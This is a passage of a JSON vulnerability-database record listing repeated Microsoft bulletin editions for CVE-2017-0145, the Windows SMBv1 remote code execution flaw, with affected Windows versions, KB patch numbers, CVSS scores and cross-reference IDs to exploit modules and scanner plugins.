"msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T16:50:29", "differentElements": ["msAffectedSoftware"], "edition": 53}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T18:44:02", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T18:44:02", "differentElements": ["msAffectedSoftware"], "edition": 54}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-17T20:55:04", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": 